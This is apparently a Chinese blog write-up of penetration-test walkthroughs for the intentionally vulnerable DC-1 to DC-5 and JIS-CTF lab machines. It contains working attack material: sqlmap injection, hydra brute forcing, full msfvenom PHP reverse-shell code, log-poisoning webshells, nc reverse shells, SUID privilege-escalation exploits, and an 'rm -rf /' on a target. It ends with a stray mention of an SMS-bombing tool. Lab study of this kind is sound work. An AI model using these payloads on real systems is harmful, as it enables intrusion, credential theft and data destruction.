set lhost 192.168.10.129

执行run,开始渗透

image-20220829095547587

已经获取靶机web权限

可以用python达到一个交互效果:

1
python -c 'import pty; pty.spawn("/bin/bash")'

image-20220829114239396

拿到第一个flag

image-20220829114352171

根据第一个flag,找到Drupal的默认配置文件为 /var/www/sites/default/settings.php

找到flag2

image-20220829114941459

登陆数据库

1
2
3
www-data@DC-1:/var/www$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t

image-20220829115448578

列出数据库

1
show databases;

image-20220829115610590

选中数据库

1
use drupaldb

image-20220829115738144

列出数据库表

1
show tables;

image-20220829115810525

选择users表查看用户信息

1
select * from users;

image-20220829115912590

回到/var/www路径下,运行这个password-hash.sh加密脚本,得到新密码

1
php scripts/password-hash.sh orange

image-20220829231852747

我们将得到的hash在mysql中利用update语句更改密码为我刚刚生成的hash密码

1
2
3
4
5
6
7
mysql -u dbuser -pR0ck3t

show databases;

use drupaldb

update users set pass='$S$DpCZByiTri9QH0oeoGEVtOgeLBcivMej1zI3GZ16KIzNikITspQj' where uid=1;

image-20220829232710615

我们通过

1
select * from users; 

知道已经更改admin密码为orange的hash密码

image-20220829232832099

我们回到web页面

输入账号:admin

输入密码:orange

image-20220829233259920

已经登陆,芜湖起飞

flag3在如图

image-20220829233421218

image-20220829233449346

我们在flag3获得了这句话

1
2
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
# 特殊的perm将有助于查找passwd,但您需要-exec该命令来确定如何获取阴影中的内容。

也就是说我需要找一下关于passwd的东西,先看看/etc/passwd

1
cat /etc/passwd

image-20220829234740943

flag4地址可能在/home/flag4

我们进去看看

image-20220829234844048

找到地方了,但是没有权限,得先提权。。。

先查找提权的软件

1
find / -perm -4000

image-20220829235024805

原来find也有提权能力,我们用find命令包含的-exec参数进行提权

1
find /var/www -exec "/bin/sh" \;

这个命令中的/bin/sh是linux内核和用户之间的命令解释器,可以将我们的命令解释并发送给linux内核。

提权后发现我们的权限已经升级为root了

我们回头看看/home/flag4里的文件

image-20220829235307752

额,flag4在root目录

image-20220829235354767

flag4到手。。。

靶机也该完成自己的使命了

我记得我是root权限

1
rm -rf /

DC-2

arp扫描一下找到目标ip为192.168.10.130

image-20220905103729449

老规矩,先用nmap扫描一下目标主机,检测其开放端口和开放服务

image-20220912191533408

我们访问一下目标的80端口

image-20220905111803400

这里直接跳转了http://dc-2/,而我们本地hosts文件没有这个域名,所以直接报错了,现在我们得配置一下hosts文件

1
vim /etc/hosts

image-20220905112028066

然后我们回到浏览器刷新,可以看出这是一个wordpress博客cms

image-20220905112120177

我们可以看到首页最右边有个flag的菜单栏

image-20220912181533565

这里说要用cewl来生成一个密码字典

所以我们用到下面的工具

kali密码攻击工具——Cewl

1
cewl -w dc2_password.txt http://dc-2/

image-20220912182123790

然后我们采用WPScanKali Linux默认自带的一款漏洞扫描工具来手机目标博客信息

1
wpscan --url dc-2 -e u

image-20220912184150165

枚举到三个账号名,写入到dc2_user.txt

1
2
3
4
5
 cat >> dc2_user.txt << EOF 
heredoc> admin
heredoc> jerry
heredoc> tom
heredoc> EOF

爆破

1
wpscan --url dc-2 -U dc2_user.txt -P dc2_password.txt
1
2
[SUCCESS] - jerry / adipiscing                                                                                                                                                                                                                   
[SUCCESS] - tom / parturient

image-20220912185616538

我们扫描一下博客的后台地址

image-20220912190519634

登录进入wordpress

image-20220912191038713

image-20220912191122865

拿到flag2,也提示了我们不能直接通过cms漏洞拿到shell了,让我们找另一种方法

最后还是tom登录上了ssh

image-20220912191801459

image-20220912192619233

权限巨低

1
2
3
4
echo $PATH
#查看上面得到path路径的所有文件
#运行结果 /home/tom/usr/bin
echo /home/tom/usr/bin/*

image-20220912204229177

使用vi进行提权

先进入vi编辑器界面

1
vi

然后按Esc键,输入

1
:set shell=/bin/bash

设置好shell并回车,接着输入

1
:shell

回车,启动shell

image-20220912204858088

写入环境

1
2
3
export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin/

image-20220912204927994

登录jerry

1
2
su jerry
密码:adipiscing

直接查找flag

1
find / -name *flag*

image-20220912205252880

找到flag4

image-20220912205413784

看看能不能SUID提权

1
find / -user root -perm -4000 -print 2>/dev/null

image-20220912205743401

看一下能用root权限的

1
sudo -l

image-20220912210153663

发现只有git。。。好吧

发现git能使用root的权限

1
sudo git help config

回车然后输入

1
!/bin/bash  (这里bash也可以换成sh)

image-20220912210719620

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@DC-2:/home/tom# cd ~
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.


image-20220912211352919

简谈SUID提权

DC-3

攻击机Kali :

IP地址:192.168.245.132

靶机 :

IP地址:192.168.245.133

刚开始的DC-3靶机即使换了NAT网络还是用不了的,无法检测到DC-3的ip,我们得去救援模式将网络修好

首先,开启DC-3靶机,然后疯狂按e

Snipaste_2022-09-26_09-29-01

找到下面ro这个地方,将ro替换成为rw signie init=/bin/bash

Snipaste_2022-09-26_09-30-32

Snipaste_2022-09-26_09-31-22

然后按ctrl+x,重启服务进入如下界面,如果并没进入此界面表示你上面修改错误,重启电脑再次进行修改

查看一下ip,发现ip是没有的

Snipaste_2022-09-26_09-31-52

我们修改一下网卡配置文件

编辑/etc/network/interfaces将配置改成下面,保存退出

Snipaste_2022-09-26_09-33-14

使用dhclient命令重新获取IP,然后我们就得到了ip(垃圾话)

image-20220926105814524

Snipaste_2022-09-26_09-34-51

老规矩,扫描本地ip

image-20220926094926539

扫描端口和服务

image-20220926110309888

仅开放了80端口

同时发现了 Joomla! - Open Source Content Managemen

浏览器看看

image-20220926112717159

使用 joomscan 专用扫描器,来获取更详细的信息

Kali 2022.1 版默认没有 joomscan 专用扫描器,需要安装

1
2
3
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl
1
perl joomscan.pl -u http://192.168.245.133/

知道了版本

image-20220927084538386

通过 searchsploit 查看是否有可以用的 EXP

image-20220927084928582

可以看到有些 SQL 注入漏洞的文本,可以看一下

image-20220927085248969

按照提示,我们就用 sqlmap 跑一下吧

image-20220927085809795

爆出所有数据库

image-20220927090425935

利用 joomladb 数据库,爆数据表

1
sqlmap -u "http://192.168.245.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -tables -p list[fullordering] 

image-20220927094821498

利用#_users 数据表,查字段

1
sqlmap -u "http://192.168.245.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]

image-20220927173035684

image-20220927173226658

1
sqlmap  -u "http://192.168.245.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]

导出#_users 数据表里所有数据

image-20220927173427864

获得网站后台登录用户名admin和密码hash值:

1
2
admin  #用户名
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #密码hash值

创建一个DC-3password.txt,然后写入password

image-20220927174316180

1
john DC-3password.txt --show

image-20220927175456943

利用通过 Joomscan 扫出的几个目录,就包含管理员登录界面

image-20220927195503974

我们尝试进入一下后台页面

image-20220927201025787

1
2
3
http://192.168.245.133/administrator/
admin
snoopy

上传webshell

image-20220927201209616

image-20220928153800067

image-20220928153852429

创建名字是test的php文件

image-20220928153918438

首先我们来到kali生成一个反弹shell

1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.245.132 lport=7777 -o test.php

把这个贴到网站刚刚创建好的php文件里面

1
<?php /**/ error_reporting(0); $ip = '192.168.245.132'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

然后点击左上角save

image-20220928150452342

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# 我们建立kali的监听
──(root㉿kali)-[~]
└─# msfconsole

# msf6 > use exploit/multi/handler

# msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

# msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


# msf6 exploit(multi/handler) > set lhost 192.168.245.132
lhost => 192.168.245.132
# msf6 exploit(multi/handler) > set lport 7777
lport => 7777
#msf6 exploit(multi/handler) > exploit

image-20220928154521471

然后访问一下下面这个地址激活反弹脚本

1
http://192.168.245.133/templates/protostar/test.php

image-20220928153730034

image-20220928154450275

ls看一眼文件内容

image-20220928154850666

看看sysinfo

image-20220928154928576

输入shell

image-20220928155138240

whoami看看账号

image-20220928155448680

先弄个交互的shell

1
2
3
4
5
which python
/usr/bin/python

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-3:/var/www/html/templates/protostar$
1
cat /etc/*-release

image-20220928160431041

我们可以通过whoami知道现在的用户是web的用户,我们的权限太低了,得想办法提权,我们在前面知道这个ubuntu的系统非常老了,版本在16.04

在msfconsole里面输入searchsploit 16.04 ubuntu

image-20220928161501777

下载脚本到kali

1
wget https://github.com/julintongxue/julintianxia/blob/main/39772.zip

上传脚本到靶机

1
upload /root/39772.zip /tmp/39772.zip

image-20220928232817068

解压之后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@DC-3:/tmp$ cd ebpf_mapfd_doubleput_exploit
cd ebpf_mapfd_doubleput_exploit

www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh doubleput.c hello suidhelper

www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh

www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh doubleput.c hello suidhelper
doubleput fuse_mount hello.c suidhelper.c
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput

root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit#
#可以看到符号已经变成#号了
1
#whoami确认一下

image-20220929004537682

回到root目录

找到flag

image-20220929004654873

在此,DC-3结束

DC-4

开启DC3,我们先用kali进行一次arp的内网扫描

1
arp-scan 192.168.245.0/24

发现一个可疑ip

image-20221031091158975

我们进行更加精确的二次扫描,这次我们使用nmap来探测其开放的端口和服务

1
nmap -T4 -O 192.168.245.147

image-20221031091340103

我们可以看到目标靶机开放了80端口的web服务,那么我们在浏览器看看这是什么网站。

image-20221031091505621

web指纹识别

命令:

1
whatweb -v 192.168.245.147

image-20221031091918457

可知网站是nginx中间件搭建

已知用户名为 admin,但不知密码,用 hydra 爆破一下

首先解压密码包

命令:

1
gunzip /usr/share/wordlists/rockyou.txt.gz

爆破密码命令:

1
hydra -L 用户名字典 -P 密码字典 -o DC4.pass -vV -t 5 -f 192.168.15.152 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
1
hydra -l admin -P /usr/share/wordlists/rockyou.txt -o DC4.pass -vV -t 5 -f 192.168.245.147 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
  • 直接账号密码爆破这类默认账号一般是admin 可以尝试下
  • -L — 用户字典
  • -l 直接写用户名
  • -o — 输出的文件名。爆破成功的话里面会放得到的密码。
  • -f — 得到了一组用户名和密码就停止爆破。
  • http-post-form — post表单提交的数据。
  • /login.php — 请求的目录。
  • username=^USER^&password=^PASS^ — 攻击载荷。
  • S=logout — 密码正确时返回的应用关键字符串。
    S=logout是因为一般登录成功之后返回的关键字符串中都有logout

image-20221031094803663

image-20221031094748346

得到账号:admin 密码:happy

image-20221031094911812

成功登录界面

点击command

点RUN 发现好像是命令执行了 ls -l 抓包看看

image-20221031095351381

果然,是通过关键字 radio提交命令的 我们加个ip add命令试试

记得空格要加+号!!

1
ip add  		#ip+add

image-20221031095504601

nice,直接返回ip

image-20221031095530729

**反弹shel **

尝试用nc看看可不可以反弹

kali上先开启侦听8080端口

1
nc -lvvp 8080

在bp写入

1
nc -e /bin/sh 192.168.245.132 8080

image-20221031095820381

kali马上接受到反弹的shell

image-20221031095841109

使用python获得交互式界面,在kali输入命令:

1
python -c "import pty;pty.spawn('/bin/bash')"

image-20221031100012727

看看具有SUID权限的命令

1
find / -user root -perm -4000 -print 2>/dev/null

image-20221031100428920

查看查看exim4版本

1
exim4 --version		#查看exim4的版本

image-20221031100458599

版本是4.89,爷笑哭了

先看看本地漏洞库

1
searchsploit exim 4

image-20221031100620731

46996符合exim 4.89 就用这个 拷贝到kali的apache web页面下

1
2
systemctl start apache2.service  									#开启apache
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html #拷贝到kali的apache web

DC4:

1
2
3
4
5
cd /tmp
wget http://192.168.245.132/46996.sh
chmod +x 46996.sh
./46996.sh
whoami

image-20221031101218731

提权成功

夺取flag

1
2
3
cd /root
ls
cat flag.txt

image-20221031101508925

DC-5

开启DC5,我们先用kali进行一次arp的内网扫描

1
arp-scan 192.168.245.0/24

发现一个可疑ip

image-20221024113754330

我们进行更加精确的二次扫描,这次我们使用nmap来探测其开放的端口和服务

1
nmap -T4 -O 192.168.245.144

image-20221024113841827

我们可以看到目标靶机开放了80端口的web服务,那么我们在浏览器看看这是什么网站。

image-20221024113931244

额。。。出现一个很陌生端web端,我们扫描一下这个网站的目录,这需要用dirsearch

1
dirsearch -u http://192.168.245.144/

image-20221024133116101

找到了很多目录,发现thankyou.php这个目录刷新之后页面的版权时间每次都在变,从2017-2020随机改变。

image-20221024133243518

image-20221024133302027

然后在footer.php这个目录下找到了版权时间的路径,而且也是刷新之后从2017-2020随机改变。

然后我们检测一下网站架构,发现是由nginx搭建的。

image-20221024145539433

根据url特征,很有可能能存在文件包含漏洞,既然可能存在 文件包含漏洞 ,现在需要知道 thankyou.php 是如何把 footer.php 包含的

wfuzz 模糊测试:

1.目录扫描

2.找参数 192.168.245.144/?=value 它能替换找到对应参数

3.密码爆破 username password

4.找sql xss

5.压力测试

这个网址是留给我们的提示,我们可以使用wfuzz来找到网页的参数

1
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt -u http://192.168.245.144/thankyou.php?FUZZ --hw 66

image-20221024135621181

由此可以推出192.168.245.144/thankyou.php?file=footer.php是我们需要的文件包含地址

那么修改footer.php为/etc/passwd看看

1
http://192.168.245.144/thankyou.php?file=/etc/passwd

image-20221024144932957

由于是niginx搭建的网站,大概推测nginx的日志地址

1
http://192.168.245.144/thankyou.php?file=/var/log/nginx/access.log

image-20221024145803116

上面还有wfuzz爆破信息呢!

现在我们打开bp,尝试写入phpinfo()进行探测,看一下是否可以包含成功。

image-20221024210159631

1
2
3
4
5
6
7
8
9
GET <?php phpinfo();?> HTTP/1.1
Host: 192.168.245.144
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

然后点击send,返回一个400报错,我们查看一下http://192.168.245.144/thankyou.php?file=/var/log/nginx/access.log发现文件包含成功。

image-20221024210334796

我们开始重新改写一句话木马

1
/thankyou.php?file=<?php @eval($_POST['shell']);?>

image-20221024210750067

1
2
3
4
5
6
7
8
9
GET /thankyou.php?file=<?php @eval($_POST['shell']);?> HTTP/1.1
Host: 192.168.245.144
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

执行返回了200,我们尝试用蚁剑连接,url是一下地址,密码是shell

1
http://192.168.245.144/thankyou.php?file=/var/log/nginx/access.log

image-20221024210959973

连接一句话木马,获得 www-data权限,尝试打开虚拟终端。。。结果发现被拒绝了。

image-20221024211229469

推测是eval函数被禁用了。

我们改写一下php一句话木马脚本

1
<?php passthru($_GET['oo']);?>

passthru - 执行外部程序并显示原始输出

1
2
3
4
5
6
7
8
9
GET /thankyou.php?file=<?php passthru($_GET['oo']);?> HTTP/1.1
Host: 192.168.245.144
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Snipaste_2022-10-24_21-18-07

image-20221024211916162

因为这个函数可以执行外部程序并且显示原始输出,所以可以配合nc反弹shell脚本。

检测函数是否能够执行,url输入:

1
http://192.168.245.144/thankyou.php?file=/var/log/nginx/access.log&oo=cat%20/etc/passwd

image-20221024212723086

完美执行,我们尝试写入nc脚本反弹shell给kali。

kali端命令

1
nc -lvvp 8888

nc执行命令

1
oo=nc kali-ip 8888 -c /bin/bash

url执行命令(将上面命令修改为url识别命令)

1
2
http://192.168.245.144/thankyou.php?file=/var/log/nginx/access.log&oo=nc%20192.168.245.132%208888%20-
c%20/bin/bash

image-20221024213351243

kali收到反弹信息。。。

修改为交互界面的shell

1
python -c "import pty;pty.spawn('/bin/bash')"

image-20221024213450091

sudo -l 发现没有sudo命令

查找一下suid程序: find / -perm -u=s -type f 2>/dev/null

image-20221024213538997

https://gtfobins.github.io/ 查找一下,发现 /bin/screen-4.5.0 可利用

我这使用kali查找其漏洞

1
searchsploit screen 4.5

image-20221024214336815

使用第一个脚本,我们查看一下用法

1
cat /usr/share/exploitdb/exploits/linux/local/41154.sh

查看文件可以知道,脚本文件需要分成3个步骤完成。

第一步:将第一部分代码写入libhax.c文件中,再执行相应命令生成libhax.so文件。最后删除libhax.c文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[/tmp]
└─# cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF

┌──(root㉿kali)-[/tmp]
└─# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
/tmp/libhax.c: In function ‘dropshell’:
/tmp/libhax.c:7:5: warning: implicit declaration of functionchmod’ [-Wimplicit-function-declaration]
7 | chmod("/tmp/rootshell", 04755);
| ^~~~~

┌──(root㉿kali)-[/tmp]
└─# ls
hsperfdata_root
libhax.c
libhax.so

┌──(root㉿kali)-[/tmp]
└─# rm -rf /tmp/libhax.c

image-20221024221557692

第二步:将第二部分的代码写入rootshell.c文件并执行命令生成rootshell文件,最后删除rootshell.c文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root㉿kali)-[/tmp]
└─# cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF


┌──(root㉿kali)-[/tmp]
└─# gcc -o /tmp/rootshell /tmp/rootshell.c
/tmp/rootshell.c: In function ‘main’:
/tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
3 | setuid(0);
| ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
4 | setgid(0);
| ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
5 | seteuid(0);
| ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
6 | setegid(0);
| ^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
7 | execvp("/bin/sh", NULL, NULL);
| ^~~~~~
/tmp/rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]

┌──(root㉿kali)-[/tmp]
└─# rm -f /tmp/rootshell.c

image-20221024222021184

第三步:将最后一部分代码写入dc5.sh文件中。需要注意的是,需要在文件开头写入#!/bin/bash表示执行环境。最后保存是需要输入:set ff=unix是为了防止脚本的格式错误。

1
2
3
4
5
6
7
8
#!/bin/bash
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

image-20221024222532234

完成3个步骤后之间把三个文件上传至靶机的/tmp文件下,然后执行./dc5即可提权。

1
scp -r kali@192.168.245.132:/tmp/dc5/* /tmp/

image-20221024225619939

1
2
3
4
5
6
7
#文件授权
www-data@dc-5:/tmp$ chmod 777 dc5.sh
chmod 777 exp.sh
www-data@dc-5:/tmp$ chmod 777 libhax.so
chmod 777 libhax.so
www-data@dc-5:/tmp$ chmod 777 rootshell
chmod 777 rootshell

image-20221024231657266

提权不了,全剧终。。。

JIS-CTF

靶机文件下载好之后,导入虚拟机。
不过这个靶机有点小问题,一开始网卡起不来,上网找了找解决方法。
解决方法:

1
2
3
4
5
6
7
8
# 账号口令 technawi - 3vilH@ksor
# 启用网卡
sudo ifconfig ens33 up
# 分配IP
sudo dhclient
# 在/etc/network/interfaces文件添加相关信息
auto ens33
iface ens33 inet dhcp

我们先用kali进行一次arp的内网扫描

1
arp-scan -l

image-20221205181026360

扫描端口和服务

1
nmap -sT -A 192.168.241.129

image-20221205181642408

尝试访问80端口

image-20221205181918331

我们启动目录扫描器

1
dirsearch -u http://192.168.241.129

image-20221205182219730

然后配合

1
nikto -h http://192.168.241.129

image-20221205194835809

然后再看一眼robots.txt

image-20221205183041664

然后一一查看网址和源代码

1
http://192.168.241.129/flag.txt

正常

image-20221205182529927

1
http://192.168.241.129/flag

第一个flag出来了

image-20221205183226044

1
http://192.168.241.129/admin_area/

额,第二个flag出来了

image-20221205182632497

发现第二个flag的同时,我们还找到了用户和密码

1
2
username : admin
password : 3v1l_H@ck3r

我们登录该账号密码发现是个上传文件的页面

image-20221205183513015

kali端生成一个监听木马

1
msfvenom -p  php/meterpreter/reverse_tcp  lhost=192.168.241.128 lport=8888 -f raw -o hacker.php

将监听木马上传

kali端开启监听端口

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.241.128
set LPORT 8888
exploit

BP放行数据,没有什么异端返回

image-20221205190009628

我们并不知道上传的文件放在哪里,结合上面的目录扫描中有一个奇怪的目录uploaded_files,试着访问http://192.168.241.129/uploaded_files/hacker.php,访问成功,说明上传的文件是放在uploaded_files这个文件夹里面的。

image-20221205190356946

kali返回连接成功信息

image-20221205191113963

kali获取shell

1
2
3
4
5
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
cd /var/www/html
cat flag.txt
cat hint.txt

image-20221205191849216

拿到第三个flag并且提示我们要找到technawi的密码才能查看flag.txt,改密码放在一个隐秘的地方。

寻找用户名为technawi并且我们有权限访问的文件。

1
find / -user technawi |grep -v "Permission" >1.txt

image-20221205192229426

第四个flag

1
cat 1.txt

image-20221205193201487

我们还拿到了用户账号和密码

1
2
username : technawi
password : 3vilH@ksor

第五flag到手

image-20221205193743545

移动手机

短信轰炸

SMSBoom